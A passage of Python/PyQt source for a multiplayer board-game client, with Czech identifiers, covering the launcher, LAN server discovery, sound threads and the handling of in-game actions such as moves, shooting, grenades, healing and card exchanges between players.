#self.sound.addEffect(\"Music/menu-hover.wav\")\r\n\r\n    @pyqtSlot()\r\n    def _clickButton(self):\r\n        self.sound.addEffect(\"Music/menu-click.wav\")\r\n\r\n    def resendVoice(self, p, i, b):\r\n        self.sound.addVoice(p, i, b)\r\n\r\n    def __init__(self, parent=None):\r\n        super(Launcher, self).__init__(parent)\r\n        self.f()\r\n\r\n\r\n        self.soundThread = QThread()\r\n        self.sound = Sound()\r\n        self.sound.moveToThread(self.soundThread)\r\n        self.soundThread.started.connect(self.sound.run)\r\n        
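# The mixer lives on its own QThread: once the thread starts below, started() fires Sound.run(), whose loop keeps mixing the voice, music and effect streams without blocking the Qt GUI event loop.\r\n        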
self.soundThread.start()\r\n\r\n\r\n        self.server = None\r\n        self.game = None\r\n\r\n        self.voip = None\r\n\r\n        self.client = C.Client()\r\n        self.client.command.connect(self.command)\r\n\r\n        self.nScanThread = QThread()\r\n        self.nScan = C.NetworkScan()\r\n        self.nScan.addServer.connect(self.pridejServer)\r\n        self.nScan.removeServer.connect(self.odstranServer)\r\n        self.nScan.moveToThread(self.nScanThread)\r\n        self.nScanThread.started.connect(self.nScan.run)\r\n        self.nScanThread.finished.connect(self.nScan.close)\r\n\r\n\r\n        self._turnedOn = False\r\n        self._players = []\r\n        self._names = []\r\n        self._name = \"MyName\"\r\n        self._serverName = \"\"\r\n        self._me = 0\r\n\r\n        self.serverList = []\r\n\r\n        self.nScanThread.start()\r\n\r\n        #print (\"BEZI ZVUK\", self.soundThread.isRunning())\r\n\r\n    addServer = pyqtSignal(int, str, str, str, str)\r\n    def pridejServer(self, index, adresa, jmeno, hraci, aktivni):\r\n        if index != -1:\r\n            self.serverList[index] = (adresa, jmeno, hraci, aktivni)\r\n        else:\r\n            self.serverList.append((adresa, jmeno, hraci, aktivni))\r\n\r\n        self.addServer.emit(index, adresa, jmeno, \"{0:d}/6\".format(hraci), \"In Game\" if aktivni else \"Waiting\")\r\n\r\n    removeServer = pyqtSignal(int)\r\n    def odstranServer(self, index):\r\n        del self.serverList[index]\r\n        self.removeServer.emit(index)\r\n\r\n    def command(self, h, nazev, args):\r\n        self.zadavatel= h\r\n        try:\r\n            self.funkce[nazev](args)\r\n        except KeyError: pass\r\n\r\n    def nove_spojeni(self, args):\r\n        self._players[self.zadavatel] = True\r\n        self.playersChanged.emit()\r\n\r\n    def odpojeni_hrace(self, args):\r\n        self._players[self.zadavatel] = False\r\n        self._names[self.zadavatel] = \"\"\r\n\r\n        self.playersChanged.emit()\r\n        self.namesChanged.emit()\r\n\r\n    renameServer = pyqtSignal(str)\r\n    def jmeno_serveru(self, args):\r\n        #self._serverName = args[0]\r\n        #self.serverNameChanged.emit() #Unfortunately that does not work\r\n        self.renameServer.emit(args[0])\r\n\r\n    connected = pyqtSignal()\r\n    def pripojen(self, args):\r\n        self.nScan.go = False\r\n        self._players = args[0]\r\n        self._names = args[1]\r\n        self._serverName = args[2]\r\n        self._me = self.zadavatel\r\n\r\n\r\n        self.connected.emit()\r\n        self.serverNameChanged.emit()\r\n        self.playersChanged.emit()\r\n        self.namesChanged.emit()\r\n        self.renameServer.emit(args[2])\r\n        self.setVolume.emit(self.sound.vVolume, self.sound.mVolume, self.sound.eVolume)\r\n\r\n    def zmen_jmeno(self, args):\r\n        self._names[self.zadavatel] = args[0]\r\n        self.namesChanged.emit()\r\n\r\n    def spust_hru(self, args):\r\n        pass\r\n\r\n    def priprava_mapy(self, args):\r\n        self.mapa= game.Mapa(*args)\r\n\r\n    def priprava_hrace(self, args):\r\n        self._me= args\r\n\r\n    def priprava_hracu(self, args):\r\n        \"\"\"\r\n        :param args: tuple(player data)\r\n        first initializes the players, then the graphical side of the game\r\n        \"\"\"\r\n        self.mapa.nacti_hrace(self._me, args[0])\r\n        view.launchGame()\r\n        self.game= view.gWindow.rootObject()\r\n        self.game.priprava_hry(self.mapa, len(args[0]))\r\n\r\n    def priprava_kola(self, args):\r\n        self.client.command.disconnect()\r\n\r\n        self.game.priprava_kola(*args)\r\n\r\n        self.game.setClient(self.client)\r\n        self.game.setSound(self.sound)\r\n\r\n\r\n    def chyba(self, args):\r\n        print (\"CLIENT: An error occurred on the server side: \", args)\r\n\r\n    def chybna_akce(self, args):\r\n        print (\"CLIENT: This request cannot be fulfilled: \", args)\r\n\r\n    def ignore(self, argumenty): pass\r\n\r\n    def f(self):\r\n        self.funkce= {\r\n            \"nove_spojeni\": self.nove_spojeni,\r\n            \"odpojeni_hrace\": 
self.odpojeni_hrace,\r\n            \"zmen_jmeno\": self.zmen_jmeno,\r\n            \"spust_hru\": self.spust_hru,\r\n            \"pripojen\": self.pripojen,\r\n            \"priprava_mapy\": self.priprava_mapy,\r\n            \"priprava_hrace\": self.priprava_hrace,\r\n            \"priprava_hracu\": self.priprava_hracu,\r\n            \"priprava_kola\": self.priprava_kola,\r\n            \"jmeno_serveru\": self.jmeno_serveru,\r\n            #\"nove_pripojeni\": self.ignore,\r\n            #\"server_info\": self.ignore,\r\n\r\n            \"chyba\": self.chyba,\r\n            \"chybna_akce\": self.chybna_akce,\r\n        }\r\n\r\nclass Game(QQuickItem):\r\n\r\n\r\n\r\n    # PROPERTIES --------------------------- PROPERTIES\r\n\r\n    parasitesChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= parasitesChanged)\r\n    def parasites(self):\r\n        return self._parasites\r\n\r\n    bloodChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= bloodChanged)\r\n    def blood(self):\r\n        return self._blood\r\n\r\n    itemCardsLeftChanged = pyqtSignal()\r\n    @pyqtProperty(int, notify= itemCardsLeftChanged)\r\n    def itemCardsLeft(self):\r\n        return self._itemCardsLeft\r\n\r\n    parasiteTurnChanged = pyqtSignal()\r\n    @pyqtProperty(int, notify= parasiteTurnChanged)\r\n    def parasiteTurn(self):\r\n        return self._parasiteTurn\r\n\r\n    playingChanged = pyqtSignal()\r\n    @pyqtProperty(int, notify= playingChanged)\r\n    def playing(self):\r\n        return self._playing\r\n\r\n    openedDoorChanged = pyqtSignal()\r\n    @pyqtProperty(int, notify= openedDoorChanged)\r\n    def openedDoor(self):\r\n        return self._openedDoor\r\n\r\n    roomCardsLeftChanged = pyqtSignal()\r\n    @pyqtProperty(int, notify= roomCardsLeftChanged)\r\n    def roomCardsLeft(self):\r\n        return self._roomCardsLeft\r\n\r\n    meetingChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= meetingChanged)\r\n    def meeting(self):\r\n        return self._meeting\r\n\r\n    meChanged = pyqtSignal()\r\n    @pyqtProperty(int, notify= meChanged)\r\n    def me(self):\r\n        return self._me\r\n\r\n    positionsChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= positionsChanged)\r\n    def positions(self):\r\n        return self._positions\r\n\r\n    hitPointsChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= hitPointsChanged)\r\n    def hitPoints(self):\r\n        return self._hitPoints\r\n\r\n    avatarsChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= avatarsChanged)\r\n    def avatars(self):\r\n        return self._avatars\r\n\r\n    cardsOnBoardChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= cardsOnBoardChanged)\r\n    def cardsOnBoard(self):\r\n        return self._cardsOnBoard\r\n\r\n    namesChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify=namesChanged)\r\n    def names(self):\r\n        return self._names\r\n\r\n    ammosChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= ammosChanged)\r\n    def ammos(self):\r\n        return self._ammos\r\n\r\n    cardsChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= cardsChanged)\r\n    def cards(self):\r\n        return self._cards\r\n\r\n    connectionsChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= connectionsChanged)\r\n    def connections(self):\r\n        return self._connections\r\n\r\n    nextRoomChanged = pyqtSignal()\r\n    @pyqtProperty(str, notify= nextRoomChanged)\r\n    def nextRoom(self):\r\n        return self._nextRoom\r\n\r\n    cardsInHandChanged = pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= cardsInHandChanged)\r\n    def cardsInHand(self):\r\n        return self._cardsInHand\r\n\r\n    corruptedChanged = pyqtSignal()\r\n    @pyqtProperty(bool, notify= corruptedChanged)\r\n    def corrupted(self):\r\n        return self._corrupted\r\n\r\n    @pyqtProperty(QVariant)\r\n    def write(self):\r\n        return \"a\"\r\n\r\n    @write.setter\r\n    def write(self, text):\r\n        text= 
text.toVariant()\r\n        print (\" // QML: \", text)\r\n\r\n    timeToChanged= pyqtSignal()\r\n    @pyqtProperty(int, notify= timeToChanged)\r\n    def timeTo(self):\r\n        return self._timeTo\r\n\r\n    actionPointsChanged= pyqtSignal()\r\n    @pyqtProperty(int, notify= actionPointsChanged)\r\n    def actionPoints(self):\r\n        return self._actionPoints\r\n\r\n    humanChanged = pyqtSignal()\r\n    @pyqtProperty(int, notify= humanChanged)\r\n    def human(self):\r\n        return self._human\r\n\r\n    @human.setter\r\n    def human(self, i):\r\n        self._human = i\r\n        self.humanChanged.emit()\r\n\r\n\r\n\r\n    # SLOTS ------------------------------- SLOTS\r\n\r\n    @pyqtSlot()\r\n    def _endTurn(self):\r\n        self.send(\"konec_kola\", ())\r\n\r\n    @pyqtSlot(QVariant)\r\n    def _newMeeting(self, pohyb):\r\n        pohyb = [int(i) for i in pohyb.toVariant()]\r\n        self._meeting = self.mapa.setkani(self._me, self._human, pohyb, True)\r\n        self.meetingChanged.emit()\r\n\r\n    pickPlayer= pyqtSignal(QVariant, str)\r\n    @pyqtSlot(int)\r\n    def _pickPlayer(self, clovek):\r\n        \"\"\"\r\n        :param clovek: speaks for itself\r\n\r\n        Finds out whom the player meets in the room, which room they are in, and which actions can be used there\r\n        \"\"\"\r\n        akce = [False, False, False, False]\r\n        if self.mapa.hrac.ma_predmet(\"Scanner\") and self._meeting: akce[0] = True\r\n        if self.mapa.hrac.naboje and self._meeting: akce[1] = True\r\n        if self.mapa.hrac.ma_predmet(\"Grenade\"): akce[2] = True\r\n        if self.mapa.hrac.vylozeno[0] and self._meeting: akce[3] = True\r\n        y, x = self.mapa.hrac.pos[clovek]\r\n        mistnost = self.mapa.mapakaret[y][x][0]\r\n        self.pickPlayer.emit(akce, mistnost)\r\n\r\n    tryHeal = pyqtSignal(int)\r\n    @pyqtSlot(str)\r\n    def _useCard(self, jmeno):\r\n        if jmeno == \"FirstAid\": self.tryHeal.emit(-1)\r\n        elif jmeno == \"EnergyDrink\": self.send(\"energit\", ())\r\n        elif jmeno in (\"Ammo\", \"Riffle\", \"Scope\", \"Card\", \"Knife\"): self.send(\"vyloz_kartu\", (jmeno, ))\r\n\r\n    @pyqtSlot(str, int, int, int) #card, person (me), target (jm)\r\n    def _changeCards(self, karta, clovek, jmT, clovekT):\r\n        #print(\"budou se menit karty\")\r\n        self.send(\"vymen_kartu\", (karta, clovek, jmT, clovekT))\r\n\r\n    @pyqtSlot(int)\r\n    def _cover(self, clovek):\r\n        self.send(\"kryti_vestou\", (clovek, ))\r\n\r\n    tryMove = pyqtSignal(int, int)\r\n    @pyqtSlot(int, int, int)\r\n    def _tryMove(self, y, x, clovek):\r\n        \"\"\"\r\n        Checks whether it is possible to move into the room\r\n        \"\"\"\r\n        y1, x1 = self.mapa.hrac.pos[clovek]\r\n        yp, xp = y - y1, x - x1\r\n        if not((yp in (1, -1) and xp == 0) or (xp in (1, -1) and yp == 0)): return #Check that the move is only one tile\r\n        if self.mapa.kolize(self._me, clovek, (yp, xp)): return #There must be a passage\r\n        self.tryMove.emit(y, x)\r\n\r\n    @pyqtSlot(int, int, int)\r\n    def _movePlayer(self, y, x, clovek):\r\n        y1, x1 = self.mapa.hrac.pos[clovek]\r\n        pohyb = (y - y1, x - x1)\r\n        self.send(\"pohyb_hrace\", (clovek, pohyb))\r\n\r\n    @pyqtSlot(int, int, int, int)\r\n    def _drawCard(self, clovek, jmT, clovekT, parazit):\r\n        if parazit > -1: jmT = self._me\r\n        self.send(\"prohledat_mistnost\", (clovek, jmT, clovekT))\r\n\r\n    @pyqtSlot()\r\n    def _burn(self):\r\n        self.send(\"vypal_hnizdo\", ())\r\n\r\n    @pyqtSlot(int, int)\r\n    def _heal(self, clovek, h):\r\n        self.send(\"vylecit_nem\", (clovek, h))\r\n\r\n    @pyqtSlot(int, int)\r\n    def _healPlayer(self, h1, h2):\r\n        self.send(\"vylecit_kar\", (h1, h2))\r\n\r\n    @pyqtSlot(int)\r\n    def _scan(self, clovek):\r\n        self.send(\"plosny_scan\", (clovek, ))\r\n\r\n    @pyqtSlot(int, int, int)\r\n    def _scanPlayer(self, clovek, jmT, 
clovekT):\r\n        #print(\"scan\")\r\n        self.send(\"scan\", (clovek, jmT, clovekT))\r\n\r\n    @pyqtSlot(int)\r\n    def _openDoors(self, clovek):\r\n        self.send(\"otevri_dvere\", (clovek, ))\r\n\r\n    @pyqtSlot(int, QVariant)\r\n    def _throwGrenade(self, clovek, pohyb):\r\n        pohyb= [int(i) for i in pohyb.toVariant()]\r\n        self.send(\"granat\", (clovek, pohyb))\r\n\r\n    @pyqtSlot(int, int, int)\r\n    def _stab(self, jmT, clovekT, parazit):\r\n        if parazit > -1: cil= (parazit, None)\r\n        else: cil= (jmT, clovekT)\r\n        self.send(\"bodnuti\", cil)\r\n\r\n    @pyqtSlot(int, int, int, QVariant)\r\n    def _shoot(self, jmT, clovekT, parazit, pohyb):\r\n        pohyb= [int(i) for i in pohyb.toVariant()]\r\n        if parazit > -1: self.send(\"strelba\", (parazit, None, pohyb))\r\n        else: self.send(\"strelba\", (jmT, clovekT, pohyb))\r\n\r\n\r\n    @pyqtSlot()\r\n    def _spawn(self):\r\n        self.send(\"spawn\", ())\r\n\r\n    @pyqtSlot(int, int, int, int)\r\n    def _placeRoom(self, clovek, y, x, reversed):\r\n        \"\"\" Checks whether a room can be discovered at coordinates y,x and sends the command to the server \"\"\"\r\n        argumenty= self.mapa._objevit_mistnost(clovek, y, x, reversed)\r\n        if argumenty:\r\n            self.send(\"objevit_mistnost\", argumenty)\r\n\r\n\r\n    @pyqtSlot()\r\n    def _close(self):\r\n        #print (\"QUIT\")\r\n        view.gWindow.close()\r\n\r\n\r\n    # -----------------HELPER FUNCTIONS-------------------\r\n\r\n    def close(self):\r\n        view.gWindow = None\r\n        self.client.command.disconnect()\r\n        self.client.command.connect(view.rootObject().command)\r\n        if not self.END: view.rootObject()._disconnect()\r\n\r\n    def updateMeeting(self, pohyb= (0, 0)):\r\n        \"\"\"\r\n        creates a new meeting list (used for the rifle and the grenade)\r\n        :param pohyb: determines the direction of the meeting\r\n        \"\"\"\r\n        self._meeting= self.mapa.setkani(self._me, self._human, pohyb, True)\r\n        self.meetingChanged.emit()\r\n\r\n    def timer(self):\r\n        \"\"\"\r\n        Updates the countdown every second...\r\n        \"\"\"\r\n        if self.pauza or self._timeTo < 1: return\r\n        self._timeTo -= 1\r\n        self.timeToChanged.emit()\r\n\r\n    def addToHand(self, hrac, predmet):\r\n        self._cards[hrac]+=1\r\n        self.cardsChanged.emit()\r\n        if hrac != self._me: return\r\n        if predmet[:-1] == \"Blood\": return\r\n        if not self.mapa.hrac.predmety[predmet]: # The player does not have the item yet, so it must be appended to _cardsInHand\r\n            self._cardsInHand.append([predmet, 1])\r\n        else: # Find the item's position in _cardsInHand and increase its count by one\r\n            for i in range(len(self._cardsInHand)):\r\n                if self._cardsInHand[i][0] == predmet:\r\n                    self._cardsInHand[i][1] += 1\r\n                    break\r\n\r\n        self.newItem.emit(predmet)\r\n        self.cardsInHandChanged.emit()\r\n\r\n    def removeFromHand(self, hrac, predmet):\r\n        self._cards[hrac] -= 1\r\n        self.cardsChanged.emit()\r\n        if hrac != self._me: return\r\n\r\n\r\n        if predmet[:-1] == \"Blood\": return\r\n\r\n        if self.mapa.hrac.predmety[predmet] == 1:\r\n            self._cardsInHand.remove([predmet, 1])\r\n        else: #Find the item's position in _cardsInHand and decrease its count by one\r\n            for i in range(len(self._cardsInHand)):\r\n                if self._cardsInHand[i][0] == predmet:\r\n                    self._cardsInHand[i][1] -= 1\r\n                    break\r\n        self.cardsInHandChanged.emit()\r\n\r\n    def action(self):\r\n        self._actionPoints -=1\r\n        self.actionPointsChanged.emit()\r\n\r\n\r\n    def __init__(self, parent= None):\r\n        super(Game, self).__init__(parent)\r\n        self.f()\r\n\r\n        self._connections= []\r\n        self._positions = []\r\n        self._hitPoints = []\r\n        self._avatars = []\r\n        self._cardsOnBoard = []\r\n        self._ammos = []\r\n        self._cards = []\r\n        self._cardsInHand= []\r\n        self._meeting = 
[]\r\n        self._parasites= []\r\n        self._blood= []\r\n        self._names= []\r\n\r\n        self._nextRoom= \"\"\r\n\r\n        self._timeTo = 100\r\n        self._actionPoints = 0\r\n        self._me = 0\r\n        self._itemCardsLeft = 0\r\n        self._roomCardsLeft = 0\r\n        self._parasiteTurn= 0\r\n        self._playing= 0\r\n        self._openedDoor= -1\r\n        self._human = 1\r\n\r\n        self._corrupted = False\r\n        # ----\r\n\r\n\r\n        self.mapa = None\r\n        self.hraje = None\r\n        self.pauza = True\r\n        self.casNaKolo = 100\r\n\r\n        self.odpocet = QTimer(self)\r\n        self.odpocet.timeout.connect(self.timer)\r\n        self.odpocet.start(1000)\r\n\r\n        self.END = False\r\n\r\n\r\n    def setClient(self, client):\r\n        self.client= client\r\n        self.send= client.sendMessage\r\n\r\n        self.client.command.connect(self.proved)\r\n        view.gWindow.closed.connect(self.close)\r\n\r\n\r\n    addMusic = pyqtSignal(str)\r\n    addEffect = pyqtSignal(str)\r\n    def setSound(self, sound):\r\n        self.addMusic.connect(sound.addMusic)\r\n        self.addEffect.connect(sound.addEffect)\r\n        self.sound = sound\r\n\r\n\r\n    def pristi_mistnost(self):\r\n        self._nextRoom= str(self.mapa.pristimistnost[3])\r\n        self._roomCardsLeft -= 1\r\n        self.roomCardsLeftChanged.emit()\r\n        self.nextRoomChanged.emit()\r\n\r\n    def proved(self, h, nazev, args):\r\n        self.zadavatel= h\r\n        self.funkce[nazev](args)\r\n\r\n    def nove_spojeni(self, args):\r\n        \"\"\"\r\n        :param args: int(player index)\r\n        \"\"\"\r\n        self._connections[self.zadavatel] = True\r\n        # The player connected\r\n\r\n    def odpojeni_hrace(self, args):\r\n        \"\"\"\r\n        :param args: int(player index)\r\n        \"\"\"\r\n        self._connections[args[0]] = False\r\n        self.connectionsChanged.emit()\r\n        # The player disconnected\r\n\r\n    def pripojeni_hrace(self, args):\r\n        self._connections[self.zadavatel] = True\r\n        self.connectionsChanged.emit()\r\n\r\n    newRoom = pyqtSignal(int, int, str, int, bool) #Adds a room to the map\r\n    def priprava_hry(self, mapa, pocet):\r\n        self.mapa= mapa\r\n        self._me = mapa.ja\r\n        self._connections= [\"connected\" for _ in range(pocet)]\r\n        self.pristi_mistnost()\r\n        #Draw the map\r\n        for y, r in enumerate(self.mapa.mapakaret):\r\n            for x, m in enumerate(r):\r\n                if m:\r\n                    prevratit = 1 if m.pop() else 0\r\n                    pouzita = bool(m[-2])\r\n                    self.newRoom.emit(y, x, m[-1], prevratit, pouzita)\r\n        #Initialize the player (me)\r\n        self._cardsInHand = self.mapa.hrac.seznamPredmetu()\r\n        self._corrupted = self.mapa.hrac.nakazeny\r\n        self.corruptedChanged.emit()\r\n        self._blood = self.mapa.hrac.krve\r\n        #Initialize the other players\r\n        for hrac in self.mapa.hraci:\r\n            me = hrac.me()\r\n            self._positions.append(me[0])\r\n            self._hitPoints.append(me[1])\r\n            self._avatars.append(me[2])\r\n            self._cardsOnBoard.append(me[3])\r\n            self._names.append(me[4])\r\n            self._ammos.append(me[5])\r\n            self._cards.append(me[6])\r\n\r\n        #Initialize variables\r\n        self._parasites = self.mapa.paraziti\r\n\r\n        self.positionsChanged.emit()\r\n        self.hitPointsChanged.emit()\r\n        self.avatarsChanged.emit()\r\n        self.cardsOnBoardChanged.emit()\r\n        self.namesChanged.emit()\r\n        self.ammosChanged.emit()\r\n        self.cardsChanged.emit()\r\n\r\n        self.connectionsChanged.emit()\r\n        self.cardsInHandChanged.emit()\r\n        self.bloodChanged.emit()\r\n        self.parasitesChanged.emit()\r\n\r\n        for i in range(len(self._positions)):\r\n            if self._positions[i][0][0] > -1 or self._positions[i][1][0] > -1:\r\n                self.spawnPlayer.emit(i) # In case I disconnected and reconnected!\r\n\r\n    def priprava_kola(self, hraje, koloP, zMistnosti, zKarty, dvere, ap):\r\n        \"\"\"\r\n        :param hraje: int(whose turn it is)\r\n        :param koloP: int(when the parasites play)\r\n        :param zMistnosti: 
int(how many rooms remain)\r\n        :param zKarty: int(how many cards remain)\r\n        :param dvere: bool(are the doors open)\r\n        :param ap: int(how many action points remain)\r\n        \"\"\"\r\n        self._playing = hraje\r\n        self._parasiteTurn = koloP\r\n        self._roomCardsLeft = zMistnosti\r\n        self._itemCardsLeft = zKarty\r\n        self._openedDoor = dvere\r\n        self._actionPoints = ap\r\n\r\n        self.mapa.otevrenedvere= dvere\r\n\r\n        self.playingChanged.emit()\r\n        self.parasiteTurnChanged.emit()\r\n        self.itemCardsLeftChanged.emit()\r\n        self.roomCardsLeftChanged.emit()\r\n        self.openedDoorChanged.emit()\r\n        self.actionPointsChanged.emit()\r\n\r\n    changeCards = pyqtSignal(int) # Cards are about to be exchanged\r\n    def pohyb_hrace(self, args):\r\n        \"\"\"\r\n        :param args: int(clone|person), tuple(movement), turn flag\r\n        :return:\r\n        \"\"\"\r\n        clovek, pohyb, tah= args\r\n        setkani = self.mapa.pohyb_hrace(self.zadavatel, clovek, pohyb) #This already moves the player\r\n        #self._positions[self.zadavatel][clovek] = self.mapa.hraci[self.zadavatel].pos[clovek]\r\n        self.positionsChanged.emit()\r\n        if setkani != [[0, 0, 0]] and self.zadavatel == self._me:\r\n            self._meeting= setkani\r\n            self.meetingChanged.emit()\r\n            self.changeCards.emit(clovek)\r\n            #print(\"vymena karet\", clovek, self._meeting)\r\n\r\n        if tah: self.action()\r\n\r\n\r\n    placeRoom = pyqtSignal(int, int, int, int, int) #Discover a room\r\n    def objevit_mistnost(self, args):\r\n        \"\"\"\r\n        :param args: list, int, int, int, int, int (see below)\r\n        refreshes the next room + adds the room to the map\r\n        \"\"\"\r\n        pos, mistnost, prevratit, pmistnost, jm, clovek= args #pmistnost = the next room\r\n        self.mapa.objevit_mistnost(pos, mistnost, prevratit, pmistnost)\r\n\r\n        self.placeRoom.emit(pos[0], pos[1], prevratit, jm, clovek)\r\n        self.pristi_mistnost()\r\n\r\n        self.action()\r\n\r\n    changingCards = pyqtSignal(int, int, int, int)\r\n    def vymen_kartu(self, args):\r\n        \"\"\"\r\n        It is probably worth unpicking the crazy tangle of signals involved in a card exchange in a bit more detail:\r\n        After a player moves, the game checks whom they met in the room; if a meeting happened, the \"changeCards\" signal is sent to the game ->\r\n        -> that means the player picks whom to trade with and which card to give away - once they do, the \"_changeCards\" slot is called ->\r\n        -> that sends a request to the server, which then replies with the \"vymen_kartu\" command, which emits the \"changingCards\" signal ->\r\n        -> at this point the second player receives the request to exchange one of their cards; that request is again sent to the server, and the server then returns the \"vymena_karet\" reply ->\r\n        -> the \"allCardsChanged\" signal: only now are both players shown the cards they received from their teammate, and the game can continue\r\n        PHEW...\r\n\r\n        :param args: int(person|clone -- for the first player), int(index of the second player), int(person|clone -- for the second player)\r\n        Draws the exchange action between the players on the map\r\n        \"\"\"\r\n        if args[1] == self._me:\r\n            self._meeting= [[False, False, self.zadavatel], [0, 0, 0]]\r\n            self._meeting[0][args[0]] = True\r\n            self.meetingChanged.emit()\r\n            self.changingCards.emit(self.zadavatel, *args)\r\n\r\n    allCardsChanged = pyqtSignal(str)\r\n    def vymena_karet(self, args):\r\n        \"\"\"\r\n        Take the handed-over item from the player and give them the new one\r\n        :param args: list(karta2, karta1)\r\n        \"\"\"\r\n        #print(\"VYMENA\", args)\r\n        if self._playing == self._me:\r\n            k1, k2, nakazeny = args\r\n        else:\r\n            k2, k1, nakazeny = args\r\n\r\n        if not self._corrupted and nakazeny == self._me:\r\n            self._corrupted = True\r\n            self.corruptedChanged.emit()\r\n\r\n        self.allCardsChanged.emit(k1)\r\n\r\n        if k1 != k2:\r\n
            self.addToHand(self._me, k1)\r\n            self.removeFromHand(self._me, k2)\r\n\r\n            self.mapa.hrac.spravuj_predmet(k1, 1)\r\n            self.mapa.hrac.spravuj_predmet(k2, -1)\r\n\r\n        self.bloodChanged.emit() # In case the blood cards changed\r\n\r\n\r\n    shootPlayer = pyqtSignal(int, int, int, QVariant, int)\r\n    shootParasite = pyqtSignal(int, int, QVariant, int)\r\n    def strelba(self, args):\r\n        \"\"\"\r\n        :param args: int(damage), tuple(target), tuple(movement)\r\n        \"\"\"\r\n        self.sound.addEffect(\"Music/gun-shot.wav\")\r\n        poskozeni, jmT, clovekT, pohyb = args\r\n        self.mapa.hraci[self.zadavatel].odeber_naboje(poskozeni)\r\n        self._ammos[self.zadavatel] -= poskozeni\r\n        self.ammosChanged.emit()\r\n        if clovekT is None:\r\n            pozice = self.mapa.hraci[self.zadavatel].pos[0][:]\r\n            pozice[0] += pohyb[0]\r\n            pozice[1] += pohyb[1]\r\n            mrtvy= self.mapa.zranit_parazita(pozice, jmT)\r\n            #self._parasites = self.mapa.paraziti\r\n            self.parasitesChanged.emit()\r\n            self.updateMeeting()\r\n            self.shootParasite.emit(self.zadavatel, jmT, pohyb, poskozeni)\r\n        else:\r\n            self.shootPlayer.emit(self.zadavatel, jmT, clovekT, pohyb, poskozeni)\r\n\r\n\r\n    stabPlayer= pyqtSignal(int, int, int, int)\r\n    stabParasite= pyqtSignal(int, int, int)\r\n    def bodnuti(self, args):\r\n        \"\"\"\r\n        Takes hit points from the players and draws the stab\r\n        :param args: bool(did it succeed?), int(ind), tuple(target)\r\n        \"\"\"\r\n        self.sound.addEffect(\"Music/slash.wav\")\r\n        poskozeni, jmT, clovekT = args\r\n        if clovekT is None:\r\n            if poskozeni:\r\n                pozice = self.mapa.hraci[self.zadavatel].pos[1]\r\n                mrtvy= self.mapa.zranit_parazita(pozice, jmT)\r\n                #self._parasites = self.mapa.paraziti\r\n                self.parasitesChanged.emit()\r\n                self.updateMeeting()\r\n            else:\r\n                mrtvy = False\r\n            self.stabParasite.emit(self.zadavatel, jmT, poskozeni)\r\n        else:\r\n            mrtvy= self.mapa.hraci[jmT].zranit(poskozeni, clovekT)\r\n            #self._hitPoints[jmT]= self.mapa.hraci[clovekT].zivoty\r\n            self.stabPlayer.emit(self.zadavatel, jmT, clovekT, poskozeni)\r\n        self.hitPointsChanged.emit()\r\n        self.positionsChanged.emit() #In case someone died\r\n        self.action()\r\n\r\n\r\n    throwGrenade = pyqtSignal(int, int, QVariant)\r\n    def granat(self, args):\r\n        \"\"\"\r\n        Takes hit points from the players and draws the grenade throw\r\n        :param args: ind, movement\r\n        \"\"\"\r\n        clovek, pohyb= args\r\n\r\n        zraneni = [[False, False] for _ in range(len(self._connections))] + [[0, 0]]\r\n        y = self.mapa.hraci[self.zadavatel].pos[clovek][0] + pohyb[0]\r\n        x = self.mapa.hraci[self.zadavatel].pos[clovek][1] + pohyb[1]\r\n        for i, h in enumerate(self.mapa.hraci):\r\n            if h.pos[0] == [y, x]:\r\n                zraneni[i][0] = True\r\n                h.zranit(1, 0)\r\n            if h.pos[1] == [y, x]:\r\n                zraneni[i][1] = True\r\n                h.zranit(1, 1)\r\n        paraziti = []\r\n        for p in self.mapa.paraziti:\r\n            if p[0] == [y, x]:\r\n                if p[2] == 2:\r\n                    paraziti.append([p[0], p[1], 1])\r\n                    zraneni[-1][1] += p[1]\r\n                else:\r\n                    zraneni[-1][0] += p[1]\r\n            else:\r\n                paraziti.append(p)\r\n\r\n        self.sound.addEffect(\"Music/grenade-throw.wav\")\r\n\r\n        self._parasites = self.mapa.paraziti = paraziti\r\n\r\n\r\n        self.throwGrenade.emit(self.zadavatel, clovek, zraneni)\r\n\r\n\r\n        self.removeFromHand(self.zadavatel, \"Grenade\")\r\n        self.mapa.hraci[self.zadavatel].spravuj_predmet(\"Grenade\", -1)\r\n\r\n        self.disableMovement.emit() #So the parasites do not fly across the whole map\r\n        self.parasitesChanged.emit()\r\n        self.hitPointsChanged.emit()\r\n        self.positionsChanged.emit() #In case someone died\r\n        self.action()\r\n\r\n    healPlayer = pyqtSignal(int)\r\n    def vylecit_kar(self, args):\r\n        \"\"\"\r\n        :param args: int(+HP clone), 
int(+HP person)\r\n        \"\"\"\r\n        self.removeFromHand(self.zadavatel, \"FirstAid\")\r\n        self.mapa.hraci[self.zadavatel].vylecit(*args)\r\n\r\n        #self._hitPoints[self.zadavatel] = self.mapa.hraci[self.zadavatel].zivoty\r\n        self.hitPointsChanged.emit()\r\n        self.healPlayer.emit(self.zadavatel)\r\n\r\n    heal = pyqtSignal(int, int)\r\n    def vylecit_nem(self, args):\r\n        \"\"\"\r\n        :param args: int(clovek), int(+HP)\r\n        \"\"\"\r\n        self.mapa.hraci[self.zadavatel].zivoty[args[0]] += args[1]\r\n        #self._hitPoints[self.zadavatel] = h.zivoty\r\n        self.hitPointsChanged.emit()\r\n        self.heal.emit(self.zadavatel, args[0])\r\n\r\n    redBull = pyqtSignal(int)\r\n    def energit(self, args):\r\n        \"\"\" Adds two extra actions \"\"\"\r\n        self.removeFromHand(self.zadavatel, \"EnergyDrink\")\r\n        self.mapa.hraci[self.zadavatel].spravuj_predmet(\"EnergyDrink\", -1)\r\n        self._actionPoints += 2\r\n        self.actionPointsChanged.emit()\r\n        self.redBull.emit(self.zadavatel)\r\n\r\n    def konec_kola(self, args):\r\n        self.pauza = True\r\n\r\n        self._playing= -1\r\n        